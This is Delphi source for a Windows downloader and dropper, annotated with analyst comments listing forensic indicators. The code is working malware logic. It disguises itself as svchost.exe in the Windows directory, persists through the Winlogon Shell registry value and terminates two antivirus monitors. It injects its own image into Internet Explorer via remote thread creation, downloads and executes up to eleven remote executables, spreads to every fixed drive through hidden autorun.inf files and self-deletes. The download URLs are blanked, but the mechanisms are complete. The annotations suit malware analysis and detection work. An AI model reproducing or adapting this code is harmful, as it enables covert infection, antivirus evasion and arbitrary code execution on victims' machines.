program InjectTheSelf;
{$IMAGEBASE $13140000}
uses
Windows,
SysUtils,
urlmon,
sendmail,
shellapi,
tlhelp32;
// Global state and embedded configuration of the sample. Analyst notes: the
// flag strings below are parsed with StrToInt at the call sites in the main
// block, and a value of '1' DISABLES the corresponding behaviour
// (kill / infectl / delself); static is compared as a string and '1' disables
// the browser-open calls. Every url* value is a blank placeholder in this copy.
var
MSG:TMSG;                        // storage for the message loop in the main block
kkk:string;                      // holds the Winlogon 'Shell' value written in the main block
cTime: TDateTime;                // referenced only from commented-out code
hModule, hModule_News: Pointer;  // not referenced in the visible code
Extent, Size, ThreadId: longword; // Size is shadowed by a local of the same name in Inject
//ProcessHandle, Pid: longword;
sysdir:array[0..145] of char;    // Windows directory, filled by GetWindowsDirectory
ret2:HKEY;                       // registry handle for the Winlogon key
window:HWND;                     // IEFrame window handle looked up in RunInject
htimer1,k,n,main:integer;        // timer id; k / main are millisecond delays derived from time / timemain
//time:pchar='5';
//timemain:pchar='5';
time:pchar='999';                // seconds between downloads (k := time * 1000)
timemain:pchar='9999';           // seconds before the first download (main := timemain * 1000)
kill:pchar='1';                  // '1' = do not terminate the AV processes named in the main block
infectl:pchar='1';               // '1' = do not start the drive-infection timer
static:pchar='1';                // '1' = do not open the url* pages in Internet Explorer
//urllabel:pchar='http://www.16518.net/test/1.exe';
//url1: pchar='http://www.16518.net/test/1.exe';
urllabel: pchar ='http:// ';     // marker download, saved as C:\program files\temp.tmp
url1: pchar ='http:// ';         // url1..url11: saved as c:\Program Files\systemN.exe and executed by Download
url2: pchar ='http:// ';
url3: pchar ='http:// ';
url4: pchar ='http:// ';
url5: pchar ='http:// ';
url6: pchar ='http:// ';
url7: pchar ='http:// ';
url8: pchar ='http:// ';
url9: pchar ='http:// ';
url10: pchar ='http:// ';
url11: pchar ='http:// ';
urlfirst: pchar ='http:// ';     // opened in IE on first install (when static <> '1')
urldown: pchar ='http:// ';      // opened in IE after injection (when static <> '1')
urlupdate: pchar ='http:// ';    // opened in IE when the installed copy is replaced (when static <> '1')
delself:pchar='1';               // '1' = do not run the ExtDelMe self-delete batch
//获取文件大小
{
function GetHostNam:String;
var
ComputerName: array[0..MAX_COMPUTERNAME_LENGTH+1] of char;
Size: Cardinal;
begin
result:='';
Size := MAX_COMPUTERNAME_LENGTH+1;
GetComputerName(ComputerName, Size);
Result:=StrPas(ComputerName);
end;
//获取本机IP
procedure nametoIP;
type
TaPInAddr = array[0..255] of PInAddr;
PaPInAddr = ^TaPInAddr;
var
phe: PHostEnt;
pptr: PaPInAddr;
Buffer: array[0..63] of char;
i: integer;
GInitData: TWSADATA;
temp:string;
begin
wsastartup($101, GInitData);
Temp := '';
GetHostName(Buffer, SizeOf(Buffer));
phe := GetHostByName(buffer);
if not assigned(phe) then
exit;
pptr := PaPInAddr(Phe^.h_addr_list);
i := 0;
while pptr^[I] <> nil do begin
Temp := Temp + StrPas(inet_ntoa(pptr^[I]^)) + ',';
inc(i);
end;
Delete(Temp, Length(Temp), 1);
try
trueip :=Temp;
except
end;
wsacleanup;
end;
}
// Writes the literal 'first run' to C:\program files\label.tmp, creating the
// file if it does not exist. The main block calls this after a first install
// and deletes the file again after RunInject; Download tests for its presence.
// Forensic indicator: label.tmp under C:\program files with that content.
procedure tlabel();
var
f:textfile;
i:integer;            // unused
buffer,disk:string;   // disk is unused here
begin
buffer:='first run';
Assignfile(F,'C:\program files\label.tmp');
if not FileExists('C:\program files\label.tmp') Then
begin
Rewrite(F);
Closefile(F);
End
Else Assignfile(F,'C:\program files\label.tmp');
{$I-}
Rewrite(F);           // recreate/truncate; I/O checking is off so a failure is reported via IOResult
{$I+}
If IOResult<> 0 Then exit;
//Write(F,Memo_gettxt.Text);
//Memo_gettxt.Text:='';
Write(F,buffer);
Closefile(F);
end;
// Start routine of the remote thread created by Inject (RunInject passes
// @Download), so this is intended to run inside the target process. Waits
// main ms, downloads urllabel to C:\program files\temp.tmp and, only if that
// file now exists, fetches url1..url11 to c:\Program Files\system1..11.exe,
// launching each with WinExec (window shown) and sleeping k ms between stages.
// Observable behaviour: urlmon URLDownloadToFile into Program Files followed
// immediately by WinExec of the new file, repeated up to eleven times.
// Control-flow note: the `if FileExists(label.tmp)` below governs only the
// next sleep(k), so url9 onward are fetched whenever temp.tmp exists, and the
// inner begin/end around url10/url11 is an unconditional compound statement.
procedure Download; //download routine
begin
sleep(main);                                     // initial delay (timemain seconds)
URLDownloadToFile(nil,urllabel, 'C:\program files\temp.tmp', 0, nil);
//WinExec('C:\program files\system1.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);
if FileExists('c:\Program Files\temp.tmp') then  // marker download succeeded
begin
URLDownloadToFile(nil, url1, 'c:\Program Files\system1.exe', 0, nil);
WinExec('c:\Program Files\system1.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);
URLDownloadToFile(nil, url2, 'c:\Program Files\system2.exe', 0, nil);
WinExec('c:\Program Files\system2.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);
URLDownloadToFile(nil, url3, 'c:\Program Files\system3.exe', 0, nil);
WinExec('c:\Program Files\system3.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);
URLDownloadToFile(nil, url4, 'c:\Program Files\system4.exe', 0, nil);
WinExec('c:\Program Files\system4.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);
URLDownloadToFile(nil, url5, 'c:\Program Files\system5.exe', 0, nil);
WinExec('c:\Program Files\system5.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);
URLDownloadToFile(nil, url6, 'c:\Program Files\system6.exe', 0, nil);
WinExec('c:\Program Files\system6.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);
URLDownloadToFile(nil, url7, 'c:\Program Files\system7.exe', 0, nil);
WinExec('c:\Program Files\system7.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);
URLDownloadToFile(nil, url8, 'c:\Program Files\system8.exe', 0, nil);
WinExec('c:\Program Files\system8.exe', SW_SHOW); //SW_SHOW or SW_HIDE
if FileExists('c:\Program Files\label.tmp') then // this condition covers only the sleep on the next line
sleep(k);
URLDownloadToFile(nil, url9, 'c:\Program Files\system9.exe', 0, nil);
WinExec('c:\Program Files\system9.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);
begin                                            // unconditional compound statement
URLDownloadToFile(nil, url10, 'c:\Program Files\system10.exe', 0, nil);
WinExec('c:\Program Files\system10.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);
URLDownloadToFile(nil, url11, 'c:\Program Files\system11.exe', 0, nil);
WinExec('c:\Program Files\system11.exe', SW_SHOW); //SW_SHOW or SW_HIDE
end;
end;
end;
// Drive propagation. Writes an autorun.inf containing 'open=pagefile.pif' to
// C:\program files, then for every drive letter C..Z whose GetDriveType is 3
// (DRIVE_FIXED) copies that autorun.inf and this executable (ParamStr(0),
// renamed pagefile.pif) to the drive root with CopyFile(..., true), i.e.
// without overwriting existing files, marks both hidden+system, and finally
// deletes the staging autorun.inf. Invoked from TimerProc1 roughly every
// 30 ms while the infection timer is active. Indicators: hidden+system
// autorun.inf and pagefile.pif in drive roots.
procedure infect();
var
f:textfile;
i:integer;
buffer,disk:string;
begin
begin
buffer:='[AutoRun]'+#13#10+'open=pagefile.pif';
Assignfile(F,'C:\program files\autorun.inf');
if not FileExists('C:\program files\autorun.inf') Then
begin
Rewrite(F);
Closefile(F);
End
Else Assignfile(F,'C:\program files\autorun.inf');
{$I-}
Rewrite(F);           // recreate/truncate; failure is reported via IOResult
{$I+}
If IOResult<> 0 Then exit;
//Write(F,Memo_gettxt.Text);
//Memo_gettxt.Text:='';
Write(F,buffer);
Closefile(F);
end;
// second step: replicate the staging file and this executable to every fixed drive
for i:= ord('c') to ord('z') do
begin
disk:=chr(i);
if getdrivetype(pchar(disk+':\'))=3 then   // 3 = DRIVE_FIXED
begin
copyfile('C:\program files\autorun.inf',pchar(disk+':\autorun.inf'),true);
copyfile(pchar(paramstr(0)),pchar(disk+':\pagefile.pif'),true);
SetFileAttributes(pchar(disk+':\autorun.inf'),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
SetFileAttributes(pchar(disk+':\pagefile.pif'),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
end;
end;
deletefile('C:\program files\autorun.inf');   // remove the staging copy
end;
// Size in bytes of FileName (expanded to a full path) obtained via FindFirst,
// or -1 when the file is not found. FindClose is never called, so every call
// leaks the search record. The main block uses it for its size self-checks and
// to compare the installed copy against this executable.
function GetFileSize(const FileName: String): LongInt;
var SearchRec: TSearchRec;
begin
if FindFirst(ExpandFileName(FileName), faAnyFile, SearchRec) = 0 then
Result := SearchRec.Size
else
Result := -1;
end;
// Terminates every running process whose image name matches ExeFileName,
// compared case-insensitively either by bare file name or by full path.
// Walks a Toolhelp32 process snapshot and, for each match, opens the process
// with PROCESS_TERMINATE and calls TerminateProcess. Returns the result of the
// last TerminateProcess call (0 on failure, 1 on success) or 0 if nothing
// matched. The OpenProcess handles are never closed. Callers in this file use
// it against AV monitor processes, 'svchost.exe' and this executable itself.
function Killpro(ExeFileName: string): integer;
const PROCESS_TERMINATE=$0001;
var ContinueLoop:BOOL;
FSnapshotHandle:THandle;
FProcessEntry32:TProcessEntry32;
begin
result:=0;
FSnapshotHandle:=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
FProcessEntry32.dwSize:=Sizeof(FProcessEntry32);
ContinueLoop:=Process32First(FSnapshotHandle, FProcessEntry32);
while integer(ContinueLoop)<>0 do
begin
// match on file name (so any process with that image name, wherever it lives) or on the full path
if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile))=ExtractFileName(UpperCase(ExeFileName)))
or (UpperCase(FProcessEntry32.szExeFile) =UpperCase(ExeFileName))) then
Result:=Integer(TerminateProcess(OpenProcess(PROCESS_TERMINATE,BOOL(0),FProcessEntry32.th32ProcessID),0));
ContinueLoop := Process32Next(FSnapshotHandle,FProcessEntry32);
end;
CloseHandle(FSnapshotHandle);
end;
// Self-deletion through a batch file. Writes %windir%\Deleteme.bat, which
// loops deleting ParamStr(0) until the file is gone and then deletes itself
// (del %0); runs it hidden at idle priority via CreateProcess and, if that
// succeeded, calls Killpro on this executable's own name so the running image
// is released for deletion. Indicator: Deleteme.bat in the Windows directory.
// The handles returned in ProcessInfo are never closed (the CloseHandle calls
// are commented out).
procedure ExtDelMe;
var
F: textfile;
BatchFileName: string;
ProcessInfo: TProcessInformation;
StartUpInfo: TStartupInfo;
begin
GetwindowsDirectory(sysdir,145);
//DelValue(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp', 'NoRealMode');
BatchFileName := sysdir + '\Deleteme.bat';
AssignFile(F, BatchFileName);
Rewrite(F);
WriteLn(F, ':try');
WriteLn(F, 'del "' + ParamStr(0) + '"');
WriteLn(F, 'if exist "' + ParamStr(0) + '"' + ' goto try');   // retry until the exe is no longer locked
WriteLn(F, 'del %0');                                         // the batch removes itself last
CloseFile(F);
FillChar(StartUpInfo, SizeOf(StartUpInfo), $00);
StartUpInfo.dwFlags := STARTF_USESHOWWINDOW;
StartUpInfo.wShowWindow := SW_HIDE;
if CreateProcess(nil, PChar(BatchFileName), nil, nil, False, IDLE_PRIORITY_CLASS, nil, nil, StartUpInfo, ProcessInfo) then
begin
Killpro(pchar(paramstr(0)));   // terminate ourselves (and any other process with the same image name)
//CloseHandle(ProcessInfo.hThread);
//CloseHandle(ProcessInfo.hProcess);
end;
end;
// Returns the Internet Explorer path stored as the default value of
// HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE,
// falling back to the hard-coded C:\Program Files\Internet Explorer\IEXPLORE.EXE.
// The key is opened with KEY_ALL_ACCESS although only a read is performed, and
// the RegOpenKeyEx result is not checked: on failure the query runs against an
// uninitialised handle and most likely fails into the fallback. RegCloseKey is
// called either way.
function GetIEAppPath:string;
var
iekey: Hkey;
iename: array [0..255] of char;
vType,dLength :DWORD;
begin
vType := REG_SZ;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE',0,KEY_ALL_ACCESS,iekey);
dLength := SizeOf(iename);
if RegQueryValueEx(iekey, '' , nil, @vType, @iename[0], @dLength) = 0 then   // '' = the key's default value
Result := iename
else
Result := 'C:\Program Files\Internet Explorer\IEXPLORE.EXE';
RegCloseKey(iekey);
end;
// stdcall timer callback installed by SetTimer(0, 0, 30, @TimerProc1) in the
// main block when infectl <> '1'. Every tick calls infect(), so the drive
// infection routine re-runs roughly every 30 ms for the life of the process.
// All four parameters are ignored.
procedure TimerProc1(Wnd:HWnd;Msg,TimerID,dwTime:DWORD);stdcall;
begin
infect();
end;
// Copies this process's own in-memory image into ProcessHandle at the same
// base address and starts a remote thread there at EntryPoint. Sequence:
// VirtualFreeEx(MEM_RELEASE) of the range at our image base in the target,
// VirtualAllocEx of SizeOfImage bytes at that address as PAGE_EXECUTE_READWRITE,
// WriteProcessMemory of the whole image, CreateRemoteThread(EntryPoint, Module).
// This only works if the target does not already use that range — presumably
// the reason for the {$IMAGEBASE $13140000} directive at the top of the file
// (confirm). No return values are checked: BytesWritten and TID are written but
// ignored, and a failed VirtualAllocEx leaves NewModule nil. Detection-relevant
// pattern: cross-process RWX allocation + memory write + remote thread creation
// into iexplore.exe / explorer.exe (see RunInject).
procedure Inject(ProcessHandle: longword; EntryPoint: pointer);
var
Module, NewModule: Pointer;
Size, BytesWritten, TID: longword;   // Size shadows the global of the same name
begin
//GetModuleHandle(nil) returns the base address of this process's own image
Module := Pointer(GetModuleHandle(nil));
//length of the in-memory image: SizeOfImage from the PE optional header,
//reached via e_lfanew + the 4-byte PE signature + the file header
Size := PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew +
SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
//original comment: "allocate a sufficiently large region in the target process";
//what this line actually does is release whatever the target maps at our base address
VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
//reserve and commit the same range in the target, at our own image base, as RWX
NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
//copy the entire image across (result and BytesWritten are not checked)
WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);
//start the remote thread at EntryPoint with Module as its parameter; the injection is complete
createRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);
end;
//关联EXE
// Selects the injection target and calls Inject with @Download as the remote
// thread start. InjType = 0: use the PID owning the Shell_TrayWnd window
// (explorer.exe). Otherwise: look for an IEFrame window, start Internet
// Explorer hidden via GetIEAppPath if none exists, wait 500 ms and take the PID
// of the IEFrame window. Then OpenProcess(PROCESS_ALL_ACCESS) and Inject.
// Observation: if FindWindow still returns 0 after the wait, PID is left
// uninitialised and OpenProcess receives whatever that local happened to hold.
// The main block always calls RunInject(1), i.e. the iexplore.exe path.
procedure RunInject(InjType:integer);
var
ProcessHandle, PID: longword;
StartupInfo: TStartupInfo;         // only referenced by the commented-out CreateProcess
ProcessInfo: TProcessInformation;
begin
if InjType=0 then //inject into explorer.exe
begin
//get the explorer PID from the Shell_TrayWnd window class (class names can be checked with Spy++)
GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);
end
else //inject into iexplore.exe
begin
Window:=FindWindow('IEFrame',nil);
if window = 0 then winexec(PChar(GetIEAppPath),sw_hide);   // start a hidden IE if none is running
//createProcess(nil,PChar(GetIEAppPath), nil, nil, False, 0, nil, nil, StartupInfo, ProcessInfo);
sleep(500);
GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);
end;
//open the target process with full access
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
Inject(ProcessHandle, @Download);
//close the handle
CloseHandle(ProcessHandle);
end;
// Program body. Paths taken, in order:
//  1. If %windir%\svchost.exe already exists (a previous install): run the size
//     self-check, and if the installed copy differs in size treat this run as an
//     update — terminate every process named svchost.exe (Killpro matches on
//     image name, so this is not limited to the dropped copy), replace the file
//     with this executable, start it hidden, optionally open urlupdate in IE and
//     optionally self-delete.
//  2. Remove leftover c:\Program Files\system1..12.exe and temp.tmp.
//  3. If %windir%\svchost.exe does not exist (first install): copy this
//     executable there, optionally terminate two AV monitor processes,
//     optionally open urlfirst, set HKLM\...\Winlogon\Shell to
//     'Explorer.exe svchost.exe' so the copy is started with the shell at logon,
//     start it hidden, write label.tmp and optionally self-delete.
//  4. Single-instance check via a mutex named 'system', size self-check again,
//     RunInject(1) to run Download inside iexplore.exe, optionally open urldown,
//     optionally start the infection timer, then pump messages forever.
// Detection notes grounded in this code: a svchost.exe located directly in the
// Windows directory rather than System32; a Winlogon Shell value containing
// 'svchost.exe'; a mutex named 'system'; label.tmp / temp.tmp / systemN.exe
// under Program Files; Deleteme.bat in the Windows directory (see ExtDelMe).
begin
{cTime := Now();
host:=DateToStr(cTime) + '-' + TimeToStr(cTime);
nametoIP;
ip:='Host:'+gethostnam+'---------IP address:'+trueip+'---download succeeded';
ip1:='Host:'+gethostnam+'---------IP address:'+trueip+'---first install';
ip2:='Host:'+gethostnam+'---------IP address:'+trueip+'---server upgrade'; }
GetwindowsDirectory(sysdir,145);
if FileExists(sysdir+'\svchost.exe') then
begin
//self-check: exit unless our own file size is <= 29000 or exactly 55296
//(presumably an anti-tamper / packing check — confirm against the build)
if (getfilesize(pchar(paramstr(0)))>29000) and (getfilesize(pchar(paramstr(0)))<>55296) then exit;
if getfilesize(pchar(sysdir+'\svchost.exe'))<>getfilesize(pchar(paramstr(0))) then //compare sizes: a different size is treated as an update
begin
killpro('svchost.exe');   // terminates every process whose image name is svchost.exe
deletefile(pchar(sysdir+'\svchost.exe'));
copyfile(pchar(paramstr(0)),pchar(sysdir+'\svchost.exe'),true);
WinExec(pchar(sysdir+'\svchost.exe'), SW_HIDE);
//tlabel(); //an upgrade does not count as the first download
if static<>'1' then shellexecute(0,'open','Iexplore.exe',urlupdate,nil,SW_hide);
//sleep(6000);
if strtoint(delself)<>1 then ExtDelMe;
end;
end;
k:=strtoint(time)*1000;         // delay between downloads, in ms
main:=strtoint(timemain)*1000;  // delay before Download starts fetching, in ms
n:=0;
//deletes c:\Program Files\system1.exe .. system12.exe (the loop runs until n > 11)
repeat
n:=n+1;
begin
DeleteFile('c:\Program Files\system'+inttostr(n)+'.exe'); //1
end;
until
n>11;
if FileExists('c:\Program Files\temp.tmp') then deletefile ('c:\Program Files\temp.tmp');
GetwindowsDirectory(sysdir,145);
if not FileExists(sysdir+'\svchost.exe') then   // first install
begin
//self-check (same size test as above)
if (getfilesize(pchar(paramstr(0)))>29000) and (getfilesize(pchar(paramstr(0)))<>55296) then exit;
copyfile(pchar(paramstr(0)),pchar(sysdir+'\svchost.exe'),true);
if strtoint(kill)<>1 then   // kill = '1' disables this
begin
killpro('kvmonxp.exe');//Jiangmin antivirus monitor
killpro('ravmon.exe')//Rising antivirus monitor
end;
if static<>'1' then shellexecute(0,'open','Iexplore.exe',urlfirst, nil, SW_HIDE);
//persistence: the Winlogon Shell value is changed so the dropped copy starts with Explorer at logon
kkk:= 'Explorer.exe svchost.exe';
RegCreateKey(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',ret2);
RegSetValueEx(Ret2,'Shell', 0, REG_SZ,pchar(kkk), Length(pchar(kkk))+ 1);
//MessageBox(0, 'Done', 'Notice', mb_iconinformation);
RegCloseKey(Ret2);
WinExec(pchar(sysdir+'\svchost.exe'), SW_HIDE);
tlabel();
//sleep(6000);
if strtoint(delself)<>1 then ExtDelMe;
end;
{//EXE association: run the file passed as the first argument
if ParamCount> 0 then
begin
origin;
winexec(pchar(ParamStr(1)),sw_show);
reg;
end; }
CreateMutex(nil, True,'system');//in-memory marker so the program does not run more than once
if (GetlastError()= ERROR_ALREADY_EXISTS) then halt;
//MessageBox(0, 'Startup complete', 'Notice', mb_iconinformation);
//self-check (same size test as above)
if (getfilesize(pchar(paramstr(0)))>29000) and (getfilesize(pchar(paramstr(0)))<>55296) then exit;
RunInject(1); //1 = inject into iexplore.exe, 0 = inject into explorer.exe
if FileExists('c:\Program Files\label.tmp') then deletefile ('c:\Program Files\label.tmp');
if static<>'1' then shellexecute(0, 'open', 'Iexplore.exe', urldown, nil, SW_HIDE);
if strtoint(infectl)<>1 then hTimer1 := SetTimer(0, 0, 30, @TimerProc1);   // infectl = '1' disables the timer
while(GetMessage(Msg,0,0,0))do //message loop: required, otherwise the timer callback never runs
begin
TranslateMessage(Msg);
DispatchMessage(Msg);
end;
end.